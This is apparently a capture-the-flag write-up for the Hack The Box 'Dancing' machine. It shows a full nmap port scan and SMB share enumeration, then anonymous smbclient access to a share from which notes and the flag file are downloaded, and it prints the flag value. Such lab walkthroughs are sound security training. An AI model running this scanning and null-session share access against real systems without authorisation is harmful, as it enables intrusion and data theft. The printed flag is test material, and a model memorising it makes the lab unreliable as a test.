Dancing
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon dancing.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Captain Captain, I see an island :) WeaponShotgun
[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-19 12:14 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:14
Completed NSE at 12:14, 0.00s elapsed
Initiating Ping Scan at 12:14
Scanning dancing.htb (10.129.80.113) [4 ports]
Completed Ping Scan at 12:14, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:14
Scanning dancing.htb (10.129.80.113) [65535 ports]
Discovered open port 135/tcp on 10.129.80.113
Discovered open port 139/tcp on 10.129.80.113
Discovered open port 445/tcp on 10.129.80.113
Discovered open port 49667/tcp on 10.129.80.113
Discovered open port 49668/tcp on 10.129.80.113
Discovered open port 49665/tcp on 10.129.80.113
Discovered open port 5985/tcp on 10.129.80.113
Discovered open port 47001/tcp on 10.129.80.113
Discovered open port 49664/tcp on 10.129.80.113
Discovered open port 49666/tcp on 10.129.80.113
Discovered open port 49669/tcp on 10.129.80.113
Completed SYN Stealth Scan at 12:15, 17.60s elapsed (65535 total ports)
NSE: Script scanning 10.129.80.113.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Nmap scan report for dancing.htb (10.129.80.113)
Host is up (0.075s latency).
Not shown: 65447 closed tcp ports (reset), 77 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
NSE: Script Post-scanning.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.84 seconds
Raw packets sent: 87171 (3.836MB) | Rcvd: 77388 (3.096MB)
[+] [smb]
SMB dancing.htb 445 DANCING [*] Windows 10.0 Build 17763 x64 (name:DANCING) (domain:Dancing) (signing:False) (SMBv1:False)
[+] IP: dancing.htb:445 Name: unknown
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[~] [smb knocker]
[ADMIN$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[C$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[IPC$]
Current directory is \\dancing.htb\IPC$\
NT_STATUS_INVALID_INFO_CLASS listing \*
[WorkShares]
Current directory is \\dancing.htb\WorkShares\
. D 0 Mon Mar 29 04:22:01 2021
.. D 0 Mon Mar 29 04:22:01 2021
Amy.J D 0 Mon Mar 29 05:08:24 2021
James.P D 0 Thu Jun 3 04:38:03 2021
5114111 blocks of size 4096. 1748671 blocks available
recon reports eleven ports and drops some useful smb information
┌──(root@ghost)-[/home/ghost]
└─# smbclient -N \\\\dancing.htb\\WorkShares
Try "help" to get a list of possible commands.
smb: \> cd Amy.J
smb: \Amy.J\> dir
. D 0 Mon Mar 29 05:08:24 2021
.. D 0 Mon Mar 29 05:08:24 2021
worknotes.txt A 94 Fri Mar 26 07:00:37 2021
5114111 blocks of size 4096. 1748644 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \Amy.J\> cd ../
smb: \> cd James.P
smb: \James.P\> dir
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
5114111 blocks of size 4096. 1747926 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \James.P\> exit
┌──(root@ghost)-[/home/ghost]
└─# cat flag.txt
5f61c10dffbc77a704d76016a22f1664